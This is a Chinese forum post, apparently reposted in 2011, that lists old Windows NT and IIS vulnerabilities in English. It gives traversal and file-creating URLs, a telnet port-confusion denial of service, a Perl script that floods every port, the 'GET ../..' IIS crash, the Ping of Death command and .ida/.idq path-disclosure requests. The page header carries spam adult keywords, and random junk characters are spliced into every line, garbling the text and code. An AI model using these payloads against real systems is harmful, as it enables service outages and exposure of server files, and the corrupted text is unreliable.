中文字幕精品亚洲无线码,99视频在线观看精品29,亚州十八禁免费不卡在线视颖,亚洲香蕉网久久综合影视

<sub id="xxpls"></sub><sub id="xxpls"></sub>

  • <listing id="xxpls"><u id="xxpls"></u></listing>
    <sub id="xxpls"></sub>

  • <sub id="xxpls"><ol id="xxpls"></ol></sub>
    <style id="xxpls"><u id="xxpls"></u></style>
  •  找回密碼
     注冊

    QQ登錄

    只需一步,快速開始

    NT的漏洞及描述(英文)

    [復制鏈接]
    1#
    發(fā)表于 2011-1-13 17:12:25 | 只看該作者 |倒序瀏覽 |閱讀模式
    受影響系統(tǒng):4.0,iis 1.0
    8 v6 A- W+ m$ z  uA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
    ' o+ o1 d3 O: ?- v) c
    ; X, C) k5 E7 o9 u4 X3 {2 H' cA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.% W/ p0 A' q- ~! ]  {

    # j: n3 y8 z% D( B3 MBy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.8 r/ }9 {2 c+ z/ Z) j2 r3 f5 Q# _7 G, H
    : _# a1 N5 n, N( Z
    --------------------------------------------------------------------- o( ?& i1 |/ ?+ R3 D% {4 _# b! A
    ; J4 }# Z' I8 X# |4 ?; z/ J: C7 m
    受影響系統(tǒng):4.0# Y5 i4 M- M2 d) w% H/ n% }
    A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
    ; d( f- o0 }" |; a
    : B/ k$ I- w: yIf the file 'target.bat' exists, the file will be truncated.
    & ?6 S! h4 e9 n1 f+ L
    / B) x3 \, ?6 j  n# p8 k4 b6 H7 v$ j, Z4 Y; b
    A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.9 o  q" u9 v) y# P

    2 w) N% O, o5 c/ ~9 @  j9 e----------------------------------------------------------------------
    - R- S7 k6 d# T5 v( m
    6 U' V; N  _* `: N# Q& Z5 G: K. _. w% `受影響系統(tǒng):3.51,4.0: X" T9 G. j6 \+ m/ {
    Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.
    ' ?9 E/ H: R. @& o- A- a7 ]  n4 x9 Y7 @1 }4 `2 Y# p5 v8 W
    The following steps;; `8 P! ?7 N2 w: q

    $ [+ |) \2 d- J: y. x. |5 }Telnet to an NT 4.0 system on port 135
    ' _& i4 }. R3 [- @: wType about 10 characters followed by a <CR>
    6 a7 G/ {' i  n7 e2 a3 L! c" tExit Telnet
    * H" t+ E$ t% _6 ?results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.1 ?6 q0 A! n# ~' `! o

    3 n) J1 }* L; U: v1 aWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
    ! ~/ C, s( U7 D6 V, z. X* L! T1 M1 P& U/ X  e- p
    The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
    0 g. g; W8 S+ r5 a' Q
    ( J2 n1 q( W6 S. {If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.0 c& Q% M) g% i( A! x) T

      p5 \. P2 c* k" |The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):
    3 ?- z7 ?: G, _+ A" j' f
    & J8 O; j7 X. `# }/*begin poke code*/, j# k# g- W8 x+ g# u

    ) z' q; N8 c& Y' `* g. Wuse Socket;6 ]: y: t% q  L
    use FileHandle;
    , `2 M3 h0 Q. l8 irequire "chat2.pl";2 d5 A0 e- r; u) P
    ( g% x4 n4 ~- B: ^1 Q, T
    $systemname = $ARGV[0] && shift;% n) _1 a0 o% Q/ R' Y- t
    " b( t' g7 |! ]/ j; v  `
    $verbose = 1; # tell me what you're hitting7 ~, H$ L. r" r/ p1 `2 H
    $knownports = 1; # don't hit known problem ports. `) L: _( y$ c% G
    for ($port = $0; $port<65535; $port++)
    : d$ x- y  Y+ ~. n, q. l+ V{
    1 f3 g, t  t- d3 V# i
    9 y4 O1 E, g' o7 h) H& a$ N
    1 i" k- t+ H) ]. a! u8 wif ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {+ D5 u& ]1 r. h6 E1 d
    next;
    & N% \! _9 \$ M4 U  O( @/ c" k}5 x; h; ?* H! E8 `# z( L: X
    $fh = chat::open_port($systemname, $port);4 ]% ?& e9 R8 q6 A3 M" g9 P
    chat::print ($fh,"This is about ten characters or more");
    5 o' X+ V8 n, a0 I4 r/ z; r' ^if ($verbose) {% h7 w% H1 J  u4 B& e& G- G! v" \1 _
    print "Trying port: $port\n";
    $ @% m2 G+ p# N3 y. N8 Y}
    ; a. K$ u# S* Q- y  Q. m! o6 v3 bchat::close($fh);
    * i1 H* e6 C! ~. u6 l. i6 ^/ F+ h$ y& q9 m( q! D
    }
    8 t1 j6 \# ~1 j# I+ `) R. l
    - B3 o3 H7 e: g5 a$ e& O: ^. X0 ^9 \1 X3 k& M
    /*end poke code*/1 `. m: C1 I* x& w

    ! n; `; f5 ^/ {* m# f: s. V% rSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername1 P) o- g# V  ^7 W4 B+ U
    & J( I/ ^3 d" f
    --------------------------------------------------------------------------------1 _( F9 l9 N5 r' M% K9 N- [: r8 Z

    : E8 g+ t0 K/ E& J; v) O, J  B受影響系統(tǒng):4.0
    - x$ }3 j1 I+ Y3 o5 B* yUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.; W6 P5 ]! ]& a7 B

    ) s, H3 U, S/ Z! \: f: E( qThis attack causes Dr. Watson to display an alert window and to log an error: * e) p7 C' c& m/ \( O3 O0 D

    6 s( W# s% `: H2 N+ m0 L"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
    / d" e( F3 U* `! D$ d! Z% \. Y; r) }0 _  p3 r+ M
    --------------------------------------------------------------------------------' m2 F- Z9 V2 M( q+ }  R

    6 F1 r' r: Z4 S% A- M( I受影響系統(tǒng):3.51,4.0
    5 c0 Y& F# B. k- `3 iLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
    0 e0 C; ?8 U; w7 M2 r6 M9 e, l6 n$ n4 B7 u6 b3 Q3 ?
    STOP: 0X0000001E
    6 C; `" ~1 p4 ^6 [. y' HKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS, r$ I1 b, H) j$ x* I2 s1 t1 t; i

    ) g0 i3 Y1 i5 t- Y: ?-OR-
    & `) {3 ~' k& I+ c" T
    ( Y1 o4 L. s9 e% i# T; b( E* ^& USTOP: 0x0000000A
    ! f, }' W5 f. Y& DIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS8 g3 o! F) z9 s9 v5 J  M9 W6 N
    0 }( x, W: Q3 P$ H; E( S% [
    NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.  T' `2 ]: R" E9 r' u
    8 z2 |5 I) L, K  U
    --------------------------------------------------------------------------------
    & E* W; [$ ]3 U$ R, I8 A! N' w. D; H# Y) r
    Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). & o! b1 u9 v1 o5 ]& `6 E

    4 n5 c' ]. p  o6 J& w3 }--------------------------------------------------------
    , _' [) Q& j  r
    * d9 X7 u) t, U0 t. F% qIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server
    您需要登錄后才可以回帖 登錄 | 注冊

    本版積分規(guī)則

    QQ|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機版|小黑屋|汶上信息港 ( 魯ICP備19052200號-1 )

    GMT+8, 2025-8-12 09:08

    Powered by Discuz! X3.5

    © 2001-2025 Discuz! Team.

    快速回復 返回頂部 返回列表